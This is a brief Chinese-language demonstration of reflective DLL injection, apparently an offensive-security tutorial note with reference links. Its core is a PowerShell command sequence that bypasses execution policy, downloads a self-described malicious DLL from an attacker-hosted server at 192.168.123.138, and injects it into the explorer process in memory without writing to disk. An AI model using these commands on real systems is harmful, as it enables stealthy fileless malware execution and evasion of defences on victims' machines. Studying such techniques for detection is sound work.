反射式dll注入的演示

dll注入和反射式dll注入的区别

合法进程 恶意dll

从本地或者dll调用

【生成恶意载荷,并执行web服务托管dll】

省略

【目标机器载入内存,使用反射式dll注入直接载入内存不落盘】

1
2
3
4
5
6
7
PowerShell -Exec Bypass

Import-Module C:\Users\whale\Desktop\Invoke-ReflectivePEInjection.ps1
$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.123.138/today.dll')
$procid = (Get-Process -Name explorer).Id

Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid

参考资料

  • https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection
  • https://www.andreafortuna.org/2017/12/08/what-is-reflective-dll-injection-and-how-can-be-detected/
  • https://github.com/stephenfewer/ReflectiveDLLInjection